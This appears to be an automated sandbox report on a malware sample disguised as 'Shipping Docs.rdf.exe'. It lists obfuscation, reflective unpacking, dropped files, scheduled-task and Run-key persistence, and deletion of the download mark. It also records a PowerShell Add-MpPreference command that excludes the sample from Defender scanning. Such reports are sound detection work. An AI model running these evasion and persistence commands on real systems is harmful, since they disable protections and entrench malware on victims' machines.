Source:	Binary string: RegSvcs.pdb source: boqXv.exe, 00000018.00000000.1334932054.0000000000872000.00000002.00000001.01000000.0000000E.sdmp, boqXv.exe.9.dr

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: Shipping Docs.rdf.exe, TestLogin.cs	.Net Code: LateBinding.LateCall((object)methodInfo, (Type)null, "Invoke", new object[2]{0,new string[3]{BN[0],BN[1],"bus_ticket"}}, (string[])null, (bool[])null)
Source: SVcPIbJno.exe.0.dr, TestLogin.cs	.Net Code: LateBinding.LateCall((object)methodInfo, (Type)null, "Invoke", new object[2]{0,new string[3]{BN[0],BN[1],"bus_ticket"}}, (string[])null, (bool[])null)
Source: 0.2.Shipping Docs.rdf.exe.2fac5ec.3.raw.unpack, XG.cs	.Net Code: Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777298)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777243)),Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777254))})
Source: 0.2.Shipping Docs.rdf.exe.5a00000.10.raw.unpack, XG.cs	.Net Code: Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777298)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777243)),Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777254))})

.NET source code contains potential unpacker

Source: 0.2.Shipping Docs.rdf.exe.5740000.8.raw.unpack, -.cs	.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: 0.2.Shipping Docs.rdf.exe.43514d0.4.raw.unpack, IKR7ckwsAeW2I8WSmF.cs	.Net Code: uuZKD2kgiA System.Reflection.Assembly.Load(byte[])
Source: 0.2.Shipping Docs.rdf.exe.3f69970.6.raw.unpack, -.cs	.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: 0.2.Shipping Docs.rdf.exe.7630000.11.raw.unpack, IKR7ckwsAeW2I8WSmF.cs	.Net Code: uuZKD2kgiA System.Reflection.Assembly.Load(byte[])

Suspicious powershell command line found

Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipping Docs.rdf.exe"
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipping Docs.rdf.exe"			Jump to behavior

Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Code function: 0_2_015BF110 pushad ; iretd	0_2_015BF111
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_02D5BB14 push esp; ret	9_2_02D5BB15
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Code function: 10_2_00E3F110 pushad ; iretd	10_2_00E3F111
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_066AFCBC push 00000006h; retf	14_2_066AFCC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_066DFD30 push es; ret	14_2_066DFD40

Source: Shipping Docs.rdf.exe	Static PE information: section name: .text entropy: 7.942823265219137
Source: SVcPIbJno.exe.0.dr	Static PE information: section name: .text entropy: 7.942823265219137

Source: 0.2.Shipping Docs.rdf.exe.2fac5ec.3.raw.unpack, XG.cs	High entropy of concatenated method names: 'S1d', 'RgtTUJcyZL', 'n1Q', 'M1r', 'Y1a', 'U1m', 'k2an4M', 'gt', 'kU', 'rK'
Source: 0.2.Shipping Docs.rdf.exe.43514d0.4.raw.unpack, IKR7ckwsAeW2I8WSmF.cs	High entropy of concatenated method names: 'u5c0F1uDVA', 'zKx0cYNlC6', 'hR80iGeqXd', 'cTL0CDT4GJ', 'eFe0bdQM0O', 'o0O0jfJkLB', 'sXP0R4HbJe', 'hWC07PSP4R', 'KjA0HolcBC', 'pwv0kKVSFl'
Source: 0.2.Shipping Docs.rdf.exe.43514d0.4.raw.unpack, F9xah8s38D8Z9bRVrh.cs	High entropy of concatenated method names: 'kLVeRhFmcF', 'Q1Ue7WNapq', 'MOLekvZjax', 'j6yeUm2Wov', 'GWlemCnbDj', 'Y0yeS5rttN', 'smyU8rRjRCG2h0p51L', 'wxU56aUHQeVUahlpy4', 'dtDeeWpumU', 'jh9e06jraG'
Source: 0.2.Shipping Docs.rdf.exe.43514d0.4.raw.unpack, pm8bMBTPh5xSudOLbd.cs	High entropy of concatenated method names: 'VfAj68TVv7', 'up0j2eUtBc', 'X2hjhjIxRB', 'ToString', 'NuSj3VXunK', 'BDhjNyxbUN', 'hUcnQFmViR5CsrKEhE7', 'yd0RInm11TiFpWWqlKP', 'deshIJm8uXsEM7cgYZM'
Source: 0.2.Shipping Docs.rdf.exe.43514d0.4.raw.unpack, k3gpj7V3na4wrI7IiM.cs	High entropy of concatenated method names: 'j6cukYOBQP', 'f2XuUysg7l', 'ToString', 'LwtuchvqeT', 'jloui1J0rV', 'tQIuCk7SsN', 'L21ubhmlEa', 'UyOujf0oKy', 'PpxuRaHyKK', 'DFAu7x4POB'
Source: 0.2.Shipping Docs.rdf.exe.43514d0.4.raw.unpack, uQ91NhyaYsgKkZVDbc.cs	High entropy of concatenated method names: 'GNEtcPj99B', 'UIDtiASoNw', 'ElYtCFqMRf', 'Mdbtbq1TRq', 'CxbtjWHk2P', 'S0NtROcJa3', 'SUmt7ksSog', 'URqtHxmMHG', 'nQrtkGsLLZ', 'jnqtU1VbhG'
Source: 0.2.Shipping Docs.rdf.exe.43514d0.4.raw.unpack, WPVqipkq52M3mAxZ6Ws.cs	High entropy of concatenated method names: 'kULlLA4tDm', 'rlMlw6g5XN', 'n1dlDsDClw', 'BiQlf4g62D', 'TexlQcWLwm', 'QxilWLv200', 'ITllpFyCJv', 'SqRl5v5Mjo', 'JC4lBvBbbs', 'OCSlEcl2RI'
Source: 0.2.Shipping Docs.rdf.exe.43514d0.4.raw.unpack, kSFcfoxpqapMq8vniP.cs	High entropy of concatenated method names: 'PVAiaLo2U7', 'OtPiX5gJ9T', 'miei6H0ADW', 'KYii2Cc9KU', 'n6yihWJHiC', 'zxoi3O7eeH', 'ycIiN3ClKV', 'ALMivwNYcV', 'I1vioDUYMo', 'UJei4Uv0be'
Source: 0.2.Shipping Docs.rdf.exe.43514d0.4.raw.unpack, UqEhJt4WpTU8jsh7qW.cs	High entropy of concatenated method names: 'tQ2uvXpEq8', 'qGau4UIiSv', 'e6atgtaEaw', 'H7yteCi39f', 'EdCuYDsCCB', 'NvvuTZKH5L', 'VuTuVWA4Hm', 'yo1uaJy8xl', 'DMeuXaQIjE', 'r6Tu6MIZAw'
Source: 0.2.Shipping Docs.rdf.exe.43514d0.4.raw.unpack, xKFl98X4DqOQ7bA4Ob.cs	High entropy of concatenated method names: 'VVh95qtLRR', 'i3s9BHkV4R', 'bqw98DdMuX', 'Ev39dM1cnS', 'pYW9OdlPcp', 'x4T9qnxHMO', 's7o9Pw86Uj', 'OIF9MN2pVf', 'sUq9r1mdMN', 'NNn9YMeP6x'
Source: 0.2.Shipping Docs.rdf.exe.43514d0.4.raw.unpack, ylyiwQ3VO4ca2cvhIW.cs	High entropy of concatenated method names: 'IduleUGSXN', 'vqDl0QdYXN', 'lM8lKKXftt', 'esClclIqMT', 'K66lioU7l2', 'JMFlbTWmgX', 'F0wljWPXKH', 'dqHtN5QNVB', 'Yh8tvUl5mq', 'jULtoUCSsv'
Source: 0.2.Shipping Docs.rdf.exe.43514d0.4.raw.unpack, dgu8mJNX4A8UAuhHuM.cs	High entropy of concatenated method names: 'PjnCf0qOsS', 'fUjCW3Aclq', 'qlOC5BKhrb', 'ioqCBZEN4F', 'gDwCmSL1xi', 'UpYCSNxlDR', 'wLLCu2eMp3', 'BC1Ctu3qmd', 'MxlCltmkGo', 'o8qCn4QcoU'
Source: 0.2.Shipping Docs.rdf.exe.43514d0.4.raw.unpack, pmvCnj8bxgmuSfyOAU.cs	High entropy of concatenated method names: 'qOBDDYkgN', 'R2XfhvSTZ', 'jZZWtXESx', 'nulpgn3US', 'Uf8ByootM', 'GnGES8QGC', 'S9xBjkZDmXa3YJlLy5', 'sEpMPpfgXiCw0oCdRE', 'wjktVjuPc', 'jaPnOZoWo'
Source: 0.2.Shipping Docs.rdf.exe.43514d0.4.raw.unpack, GEWKpAgD3dPXOjnpe8.cs	High entropy of concatenated method names: 'gOKmrlbpUL', 'T9amTZ96nI', 'IROmajvZG1', 'YvImXvTyT4', 'bVYmdiW4fK', 'g9amZvKPJ3', 'YQcmO6bxr5', 'r5PmqeMg7P', 'oCtmAqEPv9', 'bfcmPVkLXe'
Source: 0.2.Shipping Docs.rdf.exe.43514d0.4.raw.unpack, x5UP6g57eR6BuGFalB.cs	High entropy of concatenated method names: 'AK7jF2mrd3', 'sImji2oKUD', 'CCTjbIAK0y', 'AmZjRJugtB', 'oMhj7Hb9f2', 'Q2CbhkDf2D', 'Lfmb3MJdTP', 'PgQbNDTTgp', 'q8BbvCOG64', 'GCwboD68uZ'
Source: 0.2.Shipping Docs.rdf.exe.43514d0.4.raw.unpack, jHOVYAkGT7FZlCjGfFC.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'haNnaP4yVA', 'LpZnXEVniO', 'Qa8n6xUkTF', 'xddn2B16sv', 'vsInh3Se9A', 'WbMn319Ujb', 'eJ1nNVTZuU'
Source: 0.2.Shipping Docs.rdf.exe.43514d0.4.raw.unpack, EUG49yz5iwX31fQFvl.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'rP9l9A4A9g', 'nA6lmsV5lu', 'mcalSkfIUI', 'EYVlu9NTEZ', 'gcbltih4Xk', 'jh4llRVscH', 'do1ln50D1i'
Source: 0.2.Shipping Docs.rdf.exe.43514d0.4.raw.unpack, hypUvkpCCgeQfNF8wV.cs	High entropy of concatenated method names: 'Dispose', 'WTLeoGNwGp', 'j42ydJJd2B', 'xp4GGptCRk', 'GIpe4BMo2b', 'elleztXe8V', 'ProcessDialogKey', 'WYkygMYtNb', 'A8Nyei363V', 'CUAyyV6ms9'
Source: 0.2.Shipping Docs.rdf.exe.43514d0.4.raw.unpack, Cy7HG3aywFwISt4Wrk.cs	High entropy of concatenated method names: 'dEObQ3lnk3', 'fq7bpErw62', 'K6BCZUC12j', 'lmsCOxJbhp', 'q0QCq7kIo1', 'e3oCAvWi2M', 'eAsCPe9NEx', 'wUPCMXjKid', 'thoCx4bpLB', 'OvxCrkwru1'
Source: 0.2.Shipping Docs.rdf.exe.43514d0.4.raw.unpack, p5GJybW7oEL1Da8TAb.cs	High entropy of concatenated method names: 'rInRLDeHIT', 'hedRwWiqLY', 'fi3RDi2I3k', 'BC6RfaF5wv', 'j74RQoX0UZ', 'vaLRWnF8ya', 'IS7RpD0MdM', 'qS5R5Ll4lG', 'cY8RBFhvJT', 'PB2RE86kFU'
Source: 0.2.Shipping Docs.rdf.exe.43514d0.4.raw.unpack, RYA81qZGjXlQOMDt04.cs	High entropy of concatenated method names: 'nd0t8PDl0R', 'dC3tdWqy6m', 'wYvtZgnsTY', 'raptOGsg3R', 'qZKtae10ye', 'In2tq4R26S', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Shipping Docs.rdf.exe.7630000.11.raw.unpack, IKR7ckwsAeW2I8WSmF.cs	High entropy of concatenated method names: 'u5c0F1uDVA', 'zKx0cYNlC6', 'hR80iGeqXd', 'cTL0CDT4GJ', 'eFe0bdQM0O', 'o0O0jfJkLB', 'sXP0R4HbJe', 'hWC07PSP4R', 'KjA0HolcBC', 'pwv0kKVSFl'
Source: 0.2.Shipping Docs.rdf.exe.7630000.11.raw.unpack, F9xah8s38D8Z9bRVrh.cs	High entropy of concatenated method names: 'kLVeRhFmcF', 'Q1Ue7WNapq', 'MOLekvZjax', 'j6yeUm2Wov', 'GWlemCnbDj', 'Y0yeS5rttN', 'smyU8rRjRCG2h0p51L', 'wxU56aUHQeVUahlpy4', 'dtDeeWpumU', 'jh9e06jraG'
Source: 0.2.Shipping Docs.rdf.exe.7630000.11.raw.unpack, pm8bMBTPh5xSudOLbd.cs	High entropy of concatenated method names: 'VfAj68TVv7', 'up0j2eUtBc', 'X2hjhjIxRB', 'ToString', 'NuSj3VXunK', 'BDhjNyxbUN', 'hUcnQFmViR5CsrKEhE7', 'yd0RInm11TiFpWWqlKP', 'deshIJm8uXsEM7cgYZM'
Source: 0.2.Shipping Docs.rdf.exe.7630000.11.raw.unpack, k3gpj7V3na4wrI7IiM.cs	High entropy of concatenated method names: 'j6cukYOBQP', 'f2XuUysg7l', 'ToString', 'LwtuchvqeT', 'jloui1J0rV', 'tQIuCk7SsN', 'L21ubhmlEa', 'UyOujf0oKy', 'PpxuRaHyKK', 'DFAu7x4POB'
Source: 0.2.Shipping Docs.rdf.exe.7630000.11.raw.unpack, uQ91NhyaYsgKkZVDbc.cs	High entropy of concatenated method names: 'GNEtcPj99B', 'UIDtiASoNw', 'ElYtCFqMRf', 'Mdbtbq1TRq', 'CxbtjWHk2P', 'S0NtROcJa3', 'SUmt7ksSog', 'URqtHxmMHG', 'nQrtkGsLLZ', 'jnqtU1VbhG'
Source: 0.2.Shipping Docs.rdf.exe.7630000.11.raw.unpack, WPVqipkq52M3mAxZ6Ws.cs	High entropy of concatenated method names: 'kULlLA4tDm', 'rlMlw6g5XN', 'n1dlDsDClw', 'BiQlf4g62D', 'TexlQcWLwm', 'QxilWLv200', 'ITllpFyCJv', 'SqRl5v5Mjo', 'JC4lBvBbbs', 'OCSlEcl2RI'
Source: 0.2.Shipping Docs.rdf.exe.7630000.11.raw.unpack, kSFcfoxpqapMq8vniP.cs	High entropy of concatenated method names: 'PVAiaLo2U7', 'OtPiX5gJ9T', 'miei6H0ADW', 'KYii2Cc9KU', 'n6yihWJHiC', 'zxoi3O7eeH', 'ycIiN3ClKV', 'ALMivwNYcV', 'I1vioDUYMo', 'UJei4Uv0be'
Source: 0.2.Shipping Docs.rdf.exe.7630000.11.raw.unpack, UqEhJt4WpTU8jsh7qW.cs	High entropy of concatenated method names: 'tQ2uvXpEq8', 'qGau4UIiSv', 'e6atgtaEaw', 'H7yteCi39f', 'EdCuYDsCCB', 'NvvuTZKH5L', 'VuTuVWA4Hm', 'yo1uaJy8xl', 'DMeuXaQIjE', 'r6Tu6MIZAw'
Source: 0.2.Shipping Docs.rdf.exe.7630000.11.raw.unpack, xKFl98X4DqOQ7bA4Ob.cs	High entropy of concatenated method names: 'VVh95qtLRR', 'i3s9BHkV4R', 'bqw98DdMuX', 'Ev39dM1cnS', 'pYW9OdlPcp', 'x4T9qnxHMO', 's7o9Pw86Uj', 'OIF9MN2pVf', 'sUq9r1mdMN', 'NNn9YMeP6x'
Source: 0.2.Shipping Docs.rdf.exe.7630000.11.raw.unpack, ylyiwQ3VO4ca2cvhIW.cs	High entropy of concatenated method names: 'IduleUGSXN', 'vqDl0QdYXN', 'lM8lKKXftt', 'esClclIqMT', 'K66lioU7l2', 'JMFlbTWmgX', 'F0wljWPXKH', 'dqHtN5QNVB', 'Yh8tvUl5mq', 'jULtoUCSsv'
Source: 0.2.Shipping Docs.rdf.exe.7630000.11.raw.unpack, dgu8mJNX4A8UAuhHuM.cs	High entropy of concatenated method names: 'PjnCf0qOsS', 'fUjCW3Aclq', 'qlOC5BKhrb', 'ioqCBZEN4F', 'gDwCmSL1xi', 'UpYCSNxlDR', 'wLLCu2eMp3', 'BC1Ctu3qmd', 'MxlCltmkGo', 'o8qCn4QcoU'
Source: 0.2.Shipping Docs.rdf.exe.7630000.11.raw.unpack, pmvCnj8bxgmuSfyOAU.cs	High entropy of concatenated method names: 'qOBDDYkgN', 'R2XfhvSTZ', 'jZZWtXESx', 'nulpgn3US', 'Uf8ByootM', 'GnGES8QGC', 'S9xBjkZDmXa3YJlLy5', 'sEpMPpfgXiCw0oCdRE', 'wjktVjuPc', 'jaPnOZoWo'
Source: 0.2.Shipping Docs.rdf.exe.7630000.11.raw.unpack, GEWKpAgD3dPXOjnpe8.cs	High entropy of concatenated method names: 'gOKmrlbpUL', 'T9amTZ96nI', 'IROmajvZG1', 'YvImXvTyT4', 'bVYmdiW4fK', 'g9amZvKPJ3', 'YQcmO6bxr5', 'r5PmqeMg7P', 'oCtmAqEPv9', 'bfcmPVkLXe'
Source: 0.2.Shipping Docs.rdf.exe.7630000.11.raw.unpack, x5UP6g57eR6BuGFalB.cs	High entropy of concatenated method names: 'AK7jF2mrd3', 'sImji2oKUD', 'CCTjbIAK0y', 'AmZjRJugtB', 'oMhj7Hb9f2', 'Q2CbhkDf2D', 'Lfmb3MJdTP', 'PgQbNDTTgp', 'q8BbvCOG64', 'GCwboD68uZ'
Source: 0.2.Shipping Docs.rdf.exe.7630000.11.raw.unpack, jHOVYAkGT7FZlCjGfFC.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'haNnaP4yVA', 'LpZnXEVniO', 'Qa8n6xUkTF', 'xddn2B16sv', 'vsInh3Se9A', 'WbMn319Ujb', 'eJ1nNVTZuU'
Source: 0.2.Shipping Docs.rdf.exe.7630000.11.raw.unpack, EUG49yz5iwX31fQFvl.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'rP9l9A4A9g', 'nA6lmsV5lu', 'mcalSkfIUI', 'EYVlu9NTEZ', 'gcbltih4Xk', 'jh4llRVscH', 'do1ln50D1i'
Source: 0.2.Shipping Docs.rdf.exe.7630000.11.raw.unpack, hypUvkpCCgeQfNF8wV.cs	High entropy of concatenated method names: 'Dispose', 'WTLeoGNwGp', 'j42ydJJd2B', 'xp4GGptCRk', 'GIpe4BMo2b', 'elleztXe8V', 'ProcessDialogKey', 'WYkygMYtNb', 'A8Nyei363V', 'CUAyyV6ms9'
Source: 0.2.Shipping Docs.rdf.exe.7630000.11.raw.unpack, Cy7HG3aywFwISt4Wrk.cs	High entropy of concatenated method names: 'dEObQ3lnk3', 'fq7bpErw62', 'K6BCZUC12j', 'lmsCOxJbhp', 'q0QCq7kIo1', 'e3oCAvWi2M', 'eAsCPe9NEx', 'wUPCMXjKid', 'thoCx4bpLB', 'OvxCrkwru1'
Source: 0.2.Shipping Docs.rdf.exe.7630000.11.raw.unpack, p5GJybW7oEL1Da8TAb.cs	High entropy of concatenated method names: 'rInRLDeHIT', 'hedRwWiqLY', 'fi3RDi2I3k', 'BC6RfaF5wv', 'j74RQoX0UZ', 'vaLRWnF8ya', 'IS7RpD0MdM', 'qS5R5Ll4lG', 'cY8RBFhvJT', 'PB2RE86kFU'
Source: 0.2.Shipping Docs.rdf.exe.7630000.11.raw.unpack, RYA81qZGjXlQOMDt04.cs	High entropy of concatenated method names: 'nd0t8PDl0R', 'dC3tdWqy6m', 'wYvtZgnsTY', 'raptOGsg3R', 'qZKtae10ye', 'In2tq4R26S', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Shipping Docs.rdf.exe.5a00000.10.raw.unpack, XG.cs	High entropy of concatenated method names: 'S1d', 'RgtTUJcyZL', 'n1Q', 'M1r', 'Y1a', 'U1m', 'k2an4M', 'gt', 'kU', 'rK'

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File created: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe			Jump to dropped file
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	File created: C:\Users\user\AppData\Roaming\SVcPIbJno.exe			Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SVcPIbJno" /XML "C:\Users\user\AppData\Local\Temp\tmpF63B.tmp"

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run boqXv			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run boqXv			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe:Zone.Identifier read attributes \| delete			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe:Zone.Identifier read attributes \| delete

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
